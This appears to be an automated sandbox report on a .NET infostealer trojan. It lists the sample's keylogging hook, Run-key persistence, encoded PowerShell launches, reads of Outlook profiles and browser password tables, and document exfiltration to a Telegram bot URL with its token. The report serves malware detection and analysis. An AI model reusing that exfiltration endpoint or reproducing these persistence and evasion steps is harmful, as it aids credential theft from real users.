Source: Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_see
Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
              Source: kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5fHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
              Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FC01F8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06FC18F0,00000000,00000000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Window created: window name: CLIPBRDWNDCLASS
              Source: izwFjkhFJm.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_054334F8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_054360D0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EA9B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EC978
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018E9DA0
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_018EA0E8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FC3B18
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_06FCA414
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E6373
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E9260
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073ED4B8
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 15_2_073E4928
              Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.00000000038B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000000.248218694.0000000000598000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000003.318656978.0000000005301000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameWoxfcenh.dll" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 00000000.00000002.334575732.0000000003826000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000003.337045271.0000000006D3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe, 0000000F.00000002.517910261.00000000012F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe | Binary or memory string: OriginalFilenameOcotihea.exe" vs izwFjkhFJm.exe
              Source: izwFjkhFJm.exe | ReversingLabs: Detection: 33%
              Source: izwFjkhFJm.exe | Virustotal: Detection: 52%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: izwFjkhFJm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\Ienlugq
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Local\Temp\CdFileMgr
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@29/16@8/2
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: Oefdyik.exe, 0000001B.00000002.534154582.000000000302D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: izwFjkhFJm.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File read: C:\Windows\System32\drivers\etc\hosts
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: izwFjkhFJm.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: izwFjkhFJm.exe | Static file information: File size 1863168 > 1048576
              Source: izwFjkhFJm.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: izwFjkhFJm.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c4800
              Source: izwFjkhFJm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Code function: 0_2_0266A338 push esp; iretd
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe

              Boot Survival

              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
